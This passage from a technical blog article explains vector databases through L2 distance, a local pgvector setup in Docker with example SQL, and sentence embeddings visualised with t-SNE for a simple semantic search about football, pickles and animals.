&lt;p&gt;That&#39;s it. That&#39;s all the maths&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fn3&quot; id=&quot;fnref3&quot;&gt;[3]&lt;/a&gt;&lt;/sup&gt;. We can see the &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; value is much greater between &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3, 4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;Now, let&#39;s fling all this into a vector database. There are dozens to choose from but, for simplicity, I am going to use reliable, friendly Postgres and its &lt;a href=&quot;https://github.com/pgvector/pgvector&quot;&gt;&lt;code&gt;pgvector&lt;/code&gt;&lt;/a&gt; extension. The team makes a pre-cooked installation available via Docker, so we can spin it up locally:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ docker run &#92;
    --name pgvector &#92;
    -e POSTGRES_PASSWORD=vector
    -d &#92;
    -p 5432:5432 &#92;
    --rm &#92;
    pgvector/pgvector:pg16
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then feed it the relevant SQL. Our &lt;code&gt;vector(2)&lt;/code&gt; column type will receive two-dimensional vectors, and we&#39;ll &lt;code&gt;INSERT&lt;/code&gt; &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; as vectors into it.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; EXTENSION vector&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; vectors &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id BIGSERIAL &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; vector vector&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; vectors &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;vector&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&#39;[4,4]&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&#39;[-4,-4]&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we can query the database directly for the L2 distances from &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; with the &lt;code&gt;&amp;lt;-&amp;gt;&lt;/code&gt; operator.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; vectors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;vector &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Vector&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;       vectors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;vector &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;[3,4]&#39;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Distance From [3,4]&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; vectors&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which returns the exact same results as our calculations earlier:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style=&quot;text-align:left&quot;&gt;&lt;/th&gt;
&lt;th style=&quot;text-align:left&quot;&gt;Vector&lt;/th&gt;
&lt;th style=&quot;text-align:left&quot;&gt;Distance From [3,4]&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;text-align:left&quot;&gt;1&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;[4,4]&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;text-align:left&quot;&gt;2&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;[-4,-4]&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;10.63014581273465&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Cool! Mathematics wins again!&lt;/p&gt;
&lt;h2 id=&quot;but%2C-why%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#but%2C-why%3F&quot;&gt;But, Why?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Up until now we&#39;ve been considering our vectors in a relatively abstract space, where &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; had no particular meaning other than it was closer to &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; than it was &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;But we can take these vectors out of their happy abstract space and soak them in all kinds of meaning with a process called embedding.&lt;/p&gt;
&lt;p&gt;It&#39;s easiest to think of an embedding model as, well, pure magic at this point. Think of it as a ready-made &#39;text to vectors&#39; delivery service. For our purposes we&#39;ll use one called &lt;a href=&quot;https://huggingface.co/sentence-transformers/all-MiniLM-L6-v2&quot;&gt;&lt;code&gt;all-MiniLM-L6-v2&lt;/code&gt;&lt;/a&gt;, which will take a text input and return a 384 dimensional vector. This model was tuned on 1 billion sentence pairs, and as part of that training it picks up some ability to group sentences close to each other across those many dimensions. If two sentences are closely located within 384-dimensional space, the model has decided they share semantic meaning.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We won&#39;t be venturing into the LLM-world in this article, so no worrying about ChatGPT, Gemini or Claude. But one common use case for vector databases right now is to enrich a prompt with some memory and/or context. So you might store all your relevant internal documents in a vector database, and then pull out some similar text before sending your prompt &lt;em&gt;with&lt;/em&gt; those results to the LLM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let&#39;s throw a few sentences at &lt;code&gt;all-MiniLM-L6-v2&lt;/code&gt;:&lt;/p&gt;
&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;sentences &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Crystal Palace finished 10th in the premier league in 2023/24&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Man City finished 1st in the premier league in 2023/24&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Man City finished 1st in the premier league in 2022/23&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Brighton finished 11th in the premier league&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Preston finished 10th in the championship&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Cucumbers taste good when pickled&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Ginger tastes good when pickled&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Milk does not taste good when pickled&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Cats have four legs&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Dogs have four legs&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Humans have two legs&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We&#39;ve got 11 sentences bucketed into three categories: &lt;span style=&quot;color: var(--amaranth-pink)&quot;&gt;football finishing positions&lt;/span&gt;, &lt;span style=&quot;color: var(--aquamarine)&quot;&gt;pickled foods&lt;/span&gt; and &lt;span style=&quot;color: var(--uranian-blue)&quot;&gt;limbed animals&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;It&#39;s hard for a tiny human brain to visualise 384 dimensional space, but at the same time I want to have a look at them. We can use the &lt;a href=&quot;https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding&quot;&gt;t-SNE algorithm&lt;/a&gt; (again, for now, let&#39;s just consider the implementation details pure magic) to bring that 384 dimensional data back into two dimensions, and then visualise the results.&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/tsne.svg&quot; alt=&quot;using the tsne embedding to display our multi-dimensional data on a 2D plane&quot; /&gt;
&lt;p&gt;We can visibly see that the model has semantically grouped all the &lt;span style=&quot;color: var(--amaranth-pink)&quot;&gt;football finishing positions&lt;/span&gt;, &lt;span style=&quot;color: var(--aquamarine)&quot;&gt;pickled foods&lt;/span&gt; and &lt;span style=&quot;color: var(--uranian-blue)&quot;&gt;limbed animals&lt;/span&gt; close to one another. These vectors have meaning!&lt;/p&gt;
&lt;p&gt;Now, what if we create an embedding for another sentence: &lt;code&gt;Did palace win the premier league?&lt;/code&gt; Imagine this takes the place of our &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; vector from earlier, and now we want to find the closest vector stored in our database. We can once again go back to calculating the L2 distance for the nearest result.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If you&#39;re interested in going further, note that we&#39;re heading into a territory known as semantic search, which is one of the most exciting use cases for a vector database.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The response? &lt;code&gt;Crystal Palace finished 10th in the premier league in 2023/24&lt;/code&gt;. Oh well. Maybe next year.&lt;/p&gt;
&lt;hr class=&quot;footnotes-sep&quot; /&gt;
&lt;section class=&quot;footnotes&quot;&gt;
&lt;ol class=&quot;footnotes-list&quot;&gt;
&lt;li id=&quot;fn1&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;Vectors are &lt;em&gt;technically&lt;/em&gt; not points and they aren&#39;t held in fixed position in space. In this article, let&#39;s just say we will anchor our points relative to the origin &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(0,0)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; of our coordinate system and we&#39;ll use the terms interchangeably for the sake of simplicity. Another term we can use for these are positional vectors. &lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fnref1&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn2&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;This is also known as Euclidean distance. There are also other distance measures, such as cosine distance and L1/Manhattan distance. I think cosine distance is often extremely popular, but I personally find L2 the most straightforward to visualise. &lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fnref2&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn3&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;OK, quickly, one more thing: you could &lt;em&gt;also&lt;/em&gt; look at this as if it was &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;msup&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;8&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;≈&lt;/mo&gt;&lt;mn&gt;10.6&lt;/mn&gt;&lt;msup&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;7^2 + 8^2 &#92;approx 10.63^2&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span 